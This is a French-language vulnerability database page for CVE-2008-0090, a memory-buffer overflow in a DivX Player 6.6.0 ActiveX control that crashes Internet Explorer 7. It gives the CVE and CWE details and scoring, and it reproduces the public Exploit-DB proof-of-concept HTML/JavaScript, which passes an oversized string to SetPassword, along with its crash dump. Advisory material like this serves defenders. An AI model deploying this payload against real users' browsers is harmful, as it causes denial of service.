CVE-2008-0090 : Détail

CVE-2008-0090

Overflow
12.54%V4
Network
2008-01-04
00h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

A certain ActiveX control in npUpload.dll in DivX Player 6.6.0 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long argument to the SetPassword method.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4829

Date de publication : 2008-01-01 23h00 +00:00
Auteur : anonymous
EDB Vérifié : Yes

<object id="divx" classid="clsid:D050D736-2D21-4723-AD58-5B541FFB6C11" style="display:none;"> </object> <script> function crash() { var buff = ''; for(i=0;i<=500;i++) {buff+="AAAAAAAAAA";} object = document.getElementById("divx"); object.SetPassword(buff); } </script> <pre> <h3><u>DivX SetPassword (npUpload.dll) Denial of Service</u></h3> <b>Tested on IE 7 and Divx Player 6.6.0</b> <b>Registers:</b> EAX 00000000 ECX FFFFFFFF EDX 0191CA50 EBX 008E06E0 ESP 0191C9E4 EBP 0191CA50 ESI 00000000 EDI 00000000 EIP 061F2B52 npUpload.061F2B52 Access violation when reading [00000000]... <i>Discovered by shir, 02/01/2007</i> <a href="javascript:;" OnClick="crash()">Crash...</a> </pre> # milw0rm.com [2008-01-02]

Products Mentioned

Configuraton 0

Divx>>Divx_player >> Version 6.6.0

    Microsoft>>Internet_explorer >> Version 7

    Références

    http://www.securityfocus.com/bid/27106
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/4829
    Tags : exploit, x_refsource_EXPLOIT-DB